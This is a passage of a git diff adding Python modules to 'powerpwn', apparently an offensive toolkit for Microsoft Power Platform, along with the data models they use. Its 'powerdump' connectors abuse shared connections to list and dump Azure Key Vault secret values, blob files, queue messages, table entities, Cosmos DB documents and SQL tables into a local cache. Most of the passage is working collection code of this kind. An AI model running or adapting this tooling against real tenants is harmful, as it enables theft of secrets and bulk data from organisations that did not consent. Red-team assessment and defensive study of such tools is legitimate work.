b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/keyvault.py @@ -0,0 +1,86 @@ +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class KeyVaultConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + can_list_keys, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/keys") + can_list_secrets, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/secrets") + + if can_list_keys or can_list_secrets: + if (account := connection_parameters.get("accountName")) is not None: + pass + elif (account := connection_parameters.get("token:clientId")) is not None: + pass + else: + raise ValueError(f"Couldn't find expected connection parameters. Got: {connection_parameters.keys()}.") + + data_stores.append( + DataStore( + tenant=connection_parameters.get("token:TenantId"), + account=account, + scope=None, + host=f"https://{connection_parameters['vaultName'].strip(' ')}.vault.azure.net/", + name=connection_parameters["vaultName"], + extra={}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + can_list_keys, keys_val = consecutive_gets(session=self._session, expected_status_prefix="200", url=f"{self._root}/keys") + if can_list_keys: + for key_obj in keys_val: + data_records.append(DataRecord(record_type=DataDumpType.key, record_id=key_obj["name"], record_name=key_obj["name"], extra=key_obj)) + + can_list_secrets, secrets_val = consecutive_gets(session=self._session, expected_status_prefix="200", url=f"{self._root}/secrets") + if can_list_secrets: + for secret_obj in secrets_val: + data_records.append( + DataRecord(record_type=DataDumpType.secret, record_id=secret_obj["name"], record_name=secret_obj["name"], extra=secret_obj) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + if data_record.data_record.record_type == DataDumpType.key: + raise NotImplementedError("Dumping key value has not been implemented.") + elif data_record.data_record.record_type == DataDumpType.secret: + success, _, val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/secrets/{data_record.data_record.record_id}/value", + ) + else: + raise ValueError(f"Unsupported data type: {data_record.data_record.record_type}.") + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + secret_value: str = val["value"] + + data_dump = DataDump(extension="txt", encoding=ENCODING, content=secret_value.encode(ENCODING)) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_keyvault" + + @classmethod + def _apim_path(cls) -> str: + return "keyvault" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azureblob.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azureblob.py new file mode 100644 index 0000000..d76777b --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azureblob.py @@ -0,0 +1,120 @@ +import urllib.parse +from typing import Any, Dict, Generator, List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class SharedAzureBlobConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + if connection_parameters.get("name", "") != "keyBasedAuth": + return data_stores + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + storage_account_name = connection_parameters["values"]["accountName"]["value"] + + # if connection is connected with blob endpoint and not storage account + if storage_account_name.startswith("https://"): + storage_account_name = "AccountNameFromSettings" # a hack # connection_parameters["values"]["accountName"]["value"].split(".blob.core.windows.net")[0].partition("https://")[2] + + if success: + # TODO: with blob storage endpoint, we are getting Storage account name provided in the authentication 'https://exportdatasa.blob.core.windows.net' doesn't match with storage account name provided in the operation parameter + can_list_root_folders, root_folders_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_for_pagination="nextLink", + url=f"{self._root}/v2/datasets/{storage_account_name}/foldersV2", + ) + if can_list_root_folders: + for root_folder in root_folders_val: + data_stores.append( + DataStore( + tenant=None, + scope=None, + account=storage_account_name, + name=root_folder["DisplayName"], + host=f'https://{storage_account_name}.blob.core.windows.net/{root_folder["Name"]}', + extra={"storage_account_name": storage_account_name, "blob_id": root_folder["Id"]}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + folder_obj = {"Id": data_store.data_store.extra["blob_id"], "IsFolder": True} + files = self.__enumerate_folders_content_recursively(data_store.data_store.extra["storage_account_name"], folder_obj) + for file_obj in files: + data_records.append( + DataRecord( + record_type=DataDumpType.file, + record_id=file_obj["Id"], + record_name=file_obj["Name"], + extra={"file_path": file_obj["Path"], "media_type": file_obj["MediaType"]}, + ) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + file_id = urllib.parse.quote(data_record.data_record.record_id) + + success, _, val = request_and_verify( + session=self._session, + expected_status_prefix="200", + is_json_resp=False, + method="get", + url=f"{self._root}/v2/datasets/{data_record.data_store.data_store.extra['storage_account_name']}/files/{file_id}/content", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + document_value = val.encode(ENCODING) + + # add check for mypy + if file_name := data_record.data_record.record_name: + extension = file_name.split(".")[-1] + + last_index_for_extension = file_name.rindex(".") + data_record.data_record.record_name = file_name[:last_index_for_extension] + + data_dump = DataDump(extension=extension, encoding=ENCODING, content=document_value) + return data_dump + + def __enumerate_folders_content_recursively(self, storage_account: str, root_folder: Dict[str, str]) -> Generator[Dict[str, Any], None, None]: + stack = [root_folder] + while len(stack) > 0: + current_folder_obj = stack.pop() + if not current_folder_obj["IsFolder"]: + yield current_folder_obj + else: + current_folder_obj_id = current_folder_obj["Id"] + # TODO: use right pagination method with nextLink + is_success, sub_folders = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_for_pagination="nextLink", + url=f"{self._root}/v2/datasets/{storage_account}/foldersV2/{current_folder_obj_id}", + ) + if is_success and len(sub_folders) > 0: + stack.extend(sub_folders) + + @classmethod + def api_name(cls) -> str: + return "shared_azureblob" + + @classmethod + def _apim_path(cls) -> str: + return "azureblob" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azurequeues.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azurequeues.py new file mode 100644 index 0000000..4935fd3 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azurequeues.py @@ -0,0 +1,83 @@ +import json +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import request_and_verify + + +class SharedAzureQueuesConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + if connection_parameters.get("name", "") != "keyBasedAuth": + return data_stores + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + storage_account_name = connection_parameters["values"]["storageaccount"]["value"] + + # if connection is connected with blob endpoint and not storage account + if storage_account_name.startswith("https://"): + storage_account_name = "AccountNameFromSettings" # a hack # connection_parameters["values"]["accountName"]["value"].split(".blob.core.windows.net")[0].partition("https://")[2] + + if success: + can_list_root_queues, _, queues_val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/v2/storageAccounts/{storage_account_name}/queues/list", + ) + if can_list_root_queues: + for queue in queues_val: + data_stores.append( + DataStore( + tenant=None, + scope=None, + account=storage_account_name, + name=queue["Name"], + host=f'https://{storage_account_name}.queue.core.windows.net/{queue["Name"]}', + extra={}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + return [ + DataRecord(record_type=DataDumpType.queue_message, record_id=data_store.data_store.name, record_name=data_store.data_store.name, extra={}) + ] + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + queue_name = data_record.data_record.record_id + + success, _, val = request_and_verify( + session=self._session, + expected_status_prefix="200", + method="get", + url=f"{self._root}/v2/storageAccounts/{data_record.data_store.data_store.account}/queues/{queue_name}/messages?numofmessages=10", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + messages = val["QueueMessagesList"]["QueueMessage"] + document_value = json.dumps(messages).encode(ENCODING) + + data_dump = DataDump(extension="json", encoding=ENCODING, content=document_value) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_azurequeues" + + @classmethod + def _apim_path(cls) -> str: + return "azurequeues" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azuretables.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azuretables.py new file mode 100644 index 0000000..6787935 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_azuretables.py @@ -0,0 +1,82 @@ +import json +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class SharedAzureTablesConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + # TODO: create connection with table endpoint instead of account name + if connection_parameters.get("name", "") != "keyBasedAuth": + return data_stores + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + storage_account_name = connection_parameters["values"]["storageaccount"]["value"] + + # if connection is connected with table endpoint and not storage account + if storage_account_name.startswith("https://"): + storage_account_name = "AccountNameFromSettings" # a hack #connection_parameters["values"]["storageaccount"]["value"].split(".table.core.windows.net")[0].partition("https://")[2] + + if success: + # TODO: with blob storage endpoint, we are getting Storage account name provided in the authentication 'https://exportdatasa.blob.core.windows.net' doesn't match with storage account name provided in the operation parameter + data_stores.append( + DataStore( + tenant=None, + account=storage_account_name, + scope=None, + host=f"https://{storage_account_name}.table.core.windows.net", + name=storage_account_name, + extra={}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + can_list_tables, tables_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/v2/storageAccounts/{data_store.data_store.name}/tables" + ) + if can_list_tables: + for table_obj in tables_val: + table_name = table_obj["TableName"] + data_records.append(DataRecord(record_type=DataDumpType.table, record_id=table_name, record_name=table_name, extra={})) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + table_name = data_record.data_record.record_id + success, val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + url=f"{self._root}/v2/storageAccounts/{data_record.data_store.data_store.name}/tables/{table_name}/entities", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + document_value = json.dumps(val).encode(ENCODING) + + data_dump = DataDump(extension="json", encoding=ENCODING, content=document_value) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_azuretables" + + @classmethod + def _apim_path(cls) -> str: + return "azuretables" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_documentdb.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_documentdb.py new file mode 100644 index 0000000..206d0e3 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_documentdb.py @@ -0,0 +1,89 @@ +import json +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class SharedDocumentDBConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + if connection_parameters.get("name", "") != "keyBasedAuth": + return data_stores + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + db_name = connection_parameters["values"]["databaseAccount"]["value"] + + if success: + data_stores.append( + DataStore(tenant=None, account="temp", scope=None, host=f"https://{db_name}.table.cosmos.azure.com:443/", name=db_name, extra={}) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + can_list_databases, databases_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_to_extract_data="Databases", + url=f"{self._root}/v2/cosmosdb/{data_store.data_store.name}/dbs", + ) + if can_list_databases: + for db_obj in databases_val: + db_name = db_obj["id"] + + can_list_collections, collections_val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_to_extract_data="DocumentCollections", + url=f"{self._root}/v2/cosmosdb/{data_store.data_store.name}/dbs/{db_name}/colls", + ) + if can_list_collections: + for collection in collections_val: + data_records.append( + DataRecord( + record_type=DataDumpType.collection, + record_id=collection["id"], + record_name=f'{db_name}-{collection["id"]}', + extra={"db_name": db_name}, + ) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + db_name = data_record.data_record.extra["db_name"] + success, val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + property_to_extract_data="Documents", + url=f"{self._root}/v2/cosmosdb/{data_record.data_store.data_store.name}/dbs/{db_name}/colls/{data_record.data_record.record_id}/docs", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + document_value = json.dumps(val).encode(ENCODING) + + data_dump = DataDump(extension="json", encoding=ENCODING, content=document_value) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_documentdb" + + @classmethod + def _apim_path(cls) -> str: + return "documentdb" diff --git a/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_sql.py b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_sql.py new file mode 100644 index 0000000..5aa3b26 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/connections_data_collectors/connectors/shared_sql.py @@ -0,0 +1,97 @@ +import json +from typing import List + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.data_dump_entity import DataDump +from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext +from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext +from powerpwn.powerdump.utils.const import ENCODING +from powerpwn.powerdump.utils.requests_wrapper import consecutive_gets, request_and_verify + + +class SharedSqlConnector(ConnectorBase): + def _ping(self, connection_parameters: dict) -> List[DataStore]: + data_stores: List[DataStore] = [] + + # we dont have server/database for another auth types + # if we use the /servers endpoint for other auth types we will get [] + if not ( + connection_parameters.get("name", "") in ("sqlAuthentication", "windowsAuthentication") + or connection_parameters.get("authType", "") == "windows" + ): + return data_stores + + is_windows = connection_parameters.get("authType", "") == "windows" + + success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/testconnection") + + if success: + data_stores.append( + DataStore( + tenant=None, + account="temp", + scope=None, + host=f'https://{connection_parameters["server"]}.database.windows.net' + if is_windows + else f'https://{connection_parameters["values"]["server"]["value"]}', + name=connection_parameters["server"] if is_windows else connection_parameters["values"]["server"]["value"], + extra={}, + ) + ) + + return data_stores + + def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]: + data_records: List[DataRecord] = [] + + can_list_databases, databases_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/v2/databases?server={data_store.data_store.name}" + ) + if can_list_databases: + for db_obj in databases_val: + db_name = db_obj["Name"] + + can_list_tables, tables_val = consecutive_gets( + session=self._session, expected_status_prefix="200", url=f"{self._root}/v2/datasets/{data_store.data_store.name},{db_name}/tables" + ) + if can_list_tables: + for table in tables_val: + table_display_name = table["DisplayName"] + data_records.append( + DataRecord( + record_type=DataDumpType.table, + record_id=table["Name"], + record_name=f"{db_name}-{table_display_name}", + extra={"db_name": db_name}, + ) + ) + + return data_records + + def _dump(self, data_record: DataRecordWithContext) -> DataDump: + server_name = data_record.data_store.data_store.name + db_name = data_record.data_record.extra["db_name"] + success, val = consecutive_gets( + session=self._session, + expected_status_prefix="200", + url=f"{self._root}/v2/datasets/{server_name},{db_name}/tables/{data_record.data_record.record_id}/items", + ) + + if not success: + raise ValueError( + f"Unable to fetch value for data type: {data_record.data_record.record_type} with ID: {data_record.data_record.record_id}." + ) + + table_value = json.dumps(val).encode(ENCODING) + + data_dump = DataDump(extension="json", encoding=ENCODING, content=table_value) + return data_dump + + @classmethod + def api_name(cls) -> str: + return "shared_sql" + + @classmethod + def _apim_path(cls) -> str: + return "sql" diff --git a/src/powerpwn/powerdump/collect/data_collectors/data_collector.py b/src/powerpwn/powerdump/collect/data_collectors/data_collector.py new file mode 100644 index 0000000..7b8f87f --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/data_collector.py @@ -0,0 +1,28 @@ +import os +import shutil + +from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connections_data_collector import ConnectionsDataCollector +from powerpwn.powerdump.utils.model_loaders import get_environment_ids +from powerpwn.powerdump.utils.path_utils import env_collected_data_path +from powerpwn.powerdump.utils.requests_wrapper import init_session + + +class DataCollector: + """ + A Class to collect data from resources and cache them in provided cache path + """ + + def __init__(self, cache_path: str, token: str) -> None: + self.__cache_path = cache_path + self.__session = init_session(token=token) + self.__data_collectors = [ConnectionsDataCollector] + + def collect(self) -> None: + for env_id in get_environment_ids(self.__cache_path): + env_dumps_root_dir = env_collected_data_path(env_id, self.__cache_path) + if os.path.isdir(env_dumps_root_dir): + shutil.rmtree(env_dumps_root_dir) + + for data_collector in self.__data_collectors: + data_collector_instance = data_collector(self.__cache_path) + data_collector_instance.collect(self.__session, env_id, env_dumps_root_dir) diff --git a/src/powerpwn/powerdump/collect/data_collectors/enums/__init__.py b/src/powerpwn/powerdump/collect/data_collectors/enums/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_source.py b/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_source.py new file mode 100644 index 0000000..2eecf7b --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_source.py @@ -0,0 +1,7 @@ +from enum import auto + +from powerpwn.enums.str_enum import StrEnum + + +class DataDumpSource(StrEnum): + connections = auto() diff --git a/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_type.py b/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_type.py new file mode 100644 index 0000000..f65b81a --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/enums/data_dump_type.py @@ -0,0 +1,14 @@ +from enum import auto + +from powerpwn.enums.str_enum import StrEnum + + +class DataDumpType(StrEnum): + table = auto() + collection = auto() + attachment = auto() + email = auto() + secret = auto() + key = auto() + file = auto() + queue_message = auto() diff --git a/src/powerpwn/powerdump/collect/data_collectors/idata_collector.py b/src/powerpwn/powerdump/collect/data_collectors/idata_collector.py new file mode 100644 index 0000000..2c73942 --- /dev/null +++ b/src/powerpwn/powerdump/collect/data_collectors/idata_collector.py @@ -0,0 +1,9 @@ +from abc import ABC, abstractmethod + +import requests + + +class IDataCollector(ABC): + @abstractmethod + def collect(self, session: requests.Session, env_id: str, output_dir: str) -> None: + ... diff --git a/src/powerpwn/powerdump/collect/models/__init__.py b/src/powerpwn/powerdump/collect/models/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/models/base_entity.py b/src/powerpwn/powerdump/collect/models/base_entity.py new file mode 100644 index 0000000..c2c23a2 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/base_entity.py @@ -0,0 +1,22 @@ +from typing import Any + +from pydantic import BaseModel, Field, validator + +from powerpwn.powerdump.collect.models.base_validator import BaseEntityValidator +from powerpwn.powerdump.utils.const import DATA_MODEL_VERSION + + +# noinspection PyRedeclaration +class BaseEntity(BaseModel): + data_model_version: str = Field(title="Data model version", default=DATA_MODEL_VERSION) + + validate_data_model_version: Any = validator("data_model_version", allow_reuse=True)(BaseEntityValidator.validate_data_model_version) + + class Config: + """ + this config tells pydantic BaseModel to use enum values + when converting to dict() instead of enum + """ + + validate_assignment = True + use_enum_values = True diff --git a/src/powerpwn/powerdump/collect/models/base_validator.py b/src/powerpwn/powerdump/collect/models/base_validator.py new file mode 100644 index 0000000..ecb1f8b --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/base_validator.py @@ -0,0 +1,15 @@ +from typing import Any, Dict + +from pydantic import ValidationError + +from powerpwn.powerdump.utils.const import DATA_MODEL_VERSION + + +class BaseEntityValidator: + # noinspection PyUnusedLocal + @classmethod + def validate_data_model_version(cls, data_model_version: str, values: Dict[str, Any]) -> str: + if data_model_version != DATA_MODEL_VERSION: + raise ValidationError(f"Expected DATA_MODEL_VERSION {DATA_MODEL_VERSION}, got {data_model_version}.") + + return data_model_version diff --git a/src/powerpwn/powerdump/collect/models/canvas_app_entity.py b/src/powerpwn/powerdump/collect/models/canvas_app_entity.py new file mode 100644 index 0000000..ff876aa --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/canvas_app_entity.py @@ -0,0 +1,17 @@ +from datetime import datetime +from typing import List + +from pydantic import HttpUrl + +from powerpwn.powerdump.collect.models.principal_entity import Principal +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase + + +class CanvasApp(ResourceEntityBase): + version: str + created_by: Principal + created_at: datetime + last_modified_at: datetime + run_url: HttpUrl + environment_id: str + permissions: List[Principal] diff --git a/src/powerpwn/powerdump/collect/models/connection_entity.py b/src/powerpwn/powerdump/collect/models/connection_entity.py new file mode 100644 index 0000000..21c4d34 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/connection_entity.py @@ -0,0 +1,34 @@ +from datetime import datetime +from typing import Dict, Optional + +from pydantic import Field, HttpUrl + +from powerpwn.powerdump.collect.models.principal_entity import Principal +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase + + +class Connection(ResourceEntityBase): + connection_id: str = Field(..., title="Connection ID") + + is_valid: bool = Field(..., title="Has no error indicators") + shareable: bool = Field(..., title="Is connection shareable") + + connector_id: str = Field(..., title="Connector ID") + api_id: str = Field(..., title="API ID") + icon_uri: HttpUrl = Field(..., title="Icon URI") + + environment_id: str = Field(..., title="Environment ID") + environment_name: str = Field(..., title="Environment Name") + + created_at: datetime = Field(title="Created time") + last_modified_at: datetime = Field(title="Last modified time") + expiration_time: Optional[datetime] = Field(title="Expiration time") + + created_by: Principal = Field(..., title="Created by") + + connection_parameters: Dict = Field(..., title="Connection parameters") + test_uri: Optional[HttpUrl] = Field(..., title="Test URI") + + @property + def api_name(self) -> str: + return self.api_id.split("/")[-1] diff --git a/src/powerpwn/powerdump/collect/models/connector_entity.py b/src/powerpwn/powerdump/collect/models/connector_entity.py new file mode 100644 index 0000000..6b471a7 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/connector_entity.py @@ -0,0 +1,55 @@ +import json +from copy import deepcopy +from datetime import datetime +from typing import Dict + +import prance +from pydantic import Field + +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.utils.json_utils import change_obj_recu + + +class Connector(ResourceEntityBase): + api_name: str = Field(..., title="API Name") + + environment_id: str = Field(..., title="Environment ID") + + swagger: Dict = Field(..., title="OpenAPI spec") + + created_at: datetime = Field(..., title="Creation time") + + last_modified_at: datetime = Field(..., title="Last modified time") + + created_by: str = Field(..., title="Created by") + + version: str = Field(..., title="Connector version") + + def processed_swagger(self, connection_id: str, make_concrete: bool = False) -> Dict: + # avoid side effects + swagger_instance = deepcopy(self.swagger) + + # clean connectionId from path + swagger_instance["paths"] = {k.replace("{connectionId}", connection_id): v for k, v in swagger_instance.get("paths", {}).items()} + + if make_concrete: + # resolve references + parser = prance.ResolvingParser(spec_string=json.dumps(swagger_instance)) + parsed_swagger = parser.specification + + # ensure examples are generate with rich schemas + def _arrays_should_have_min_items(_val: Dict): + if _val.get("type") == "array": + _val["minItems"] = 1 + + change_obj_recu(val=parsed_swagger, obj_changer=_arrays_should_have_min_items) + + def _objects_should_have_all_properties(_val: Dict): + if _val.get("type") == "object" and "required" not in _val: + _val["required"] = list(_val.get("properties", {}).keys()) + + change_obj_recu(val=parsed_swagger, obj_changer=_objects_should_have_all_properties) + else: + parsed_swagger = swagger_instance + + return parsed_swagger diff --git a/src/powerpwn/powerdump/collect/models/data_dump_entity.py b/src/powerpwn/powerdump/collect/models/data_dump_entity.py new file mode 100644 index 0000000..ba51ec4 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/data_dump_entity.py @@ -0,0 +1,18 @@ +from typing import Optional + +from pydantic import Field + +from powerpwn.powerdump.collect.models.base_entity import BaseEntity +from powerpwn.powerdump.collect.models.data_record_entity import DataRecordWithContext +from powerpwn.powerdump.utils.const import ENCODING + + +class DataDump(BaseEntity): + extension: str = Field(..., title="File extension") + encoding: Optional[str] = Field(title="Text encoding", default=ENCODING) + content: bytes = Field(..., title="Content in bytes") + + +class DataDumpWithContext(BaseEntity): + data_record: DataRecordWithContext = Field(..., title="Data record") + data_dump: DataDump = Field(..., title="Data Dump") diff --git a/src/powerpwn/powerdump/collect/models/data_record_entity.py b/src/powerpwn/powerdump/collect/models/data_record_entity.py new file mode 100644 index 0000000..a6c0f71 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/data_record_entity.py @@ -0,0 +1,19 @@ +from typing import Dict, Optional + +from pydantic import Field + +from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType +from powerpwn.powerdump.collect.models.base_entity import BaseEntity +from powerpwn.powerdump.collect.models.data_store_entity import DataStoreWithContext + + +class DataRecord(BaseEntity): + record_type: DataDumpType = Field(..., title="Record type") + record_id: str = Field(..., title="Record ID") + record_name: Optional[str] = Field(..., title="Record display name") + extra: Dict = Field(..., title="Additional information") + + +class DataRecordWithContext(BaseEntity): + data_store: DataStoreWithContext = Field(..., title="Data Store") + data_record: DataRecord = Field(..., title="Data Record") diff --git a/src/powerpwn/powerdump/collect/models/data_store_entity.py b/src/powerpwn/powerdump/collect/models/data_store_entity.py new file mode 100644 index 0000000..abaac97 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/data_store_entity.py @@ -0,0 +1,26 @@ +from typing import Any, Dict, Optional + +from pydantic import Field, HttpUrl, validator + +from powerpwn.powerdump.collect.models.base_entity import BaseEntity +from powerpwn.powerdump.collect.models.data_store_validator import DataStoreValidator + + +class DataStore(BaseEntity): + account: str = Field(..., title="Account ID") + tenant: Optional[str] = Field(..., title="Tenant ID") # order matters, tenant relies on account + + scope: Optional[str] = Field(..., title="Access scope") + + host: HttpUrl = Field(..., title="Host") + name: Optional[str] = Field(..., title="Display name") + + extra: Dict = Field(..., title="Additional information") + + validate_tenant: Any = validator("tenant", allow_reuse=True)(DataStoreValidator.validate_tenant) + + +class DataStoreWithContext(BaseEntity): + api_name: str = Field(..., title="API Name", description="Example: shared_gmail") + connection_id: str = Field(..., title="Connection ID") + data_store: DataStore = Field(..., title="Data Store") diff --git a/src/powerpwn/powerdump/collect/models/data_store_validator.py b/src/powerpwn/powerdump/collect/models/data_store_validator.py new file mode 100644 index 0000000..d62582b --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/data_store_validator.py @@ -0,0 +1,14 @@ +from typing import Any, Dict, Optional + + +class DataStoreValidator: + # noinspection PyUnusedLocal + @classmethod + def validate_tenant(cls, tenant: Optional[str], values: Dict[str, Any]) -> Optional[str]: + if tenant in 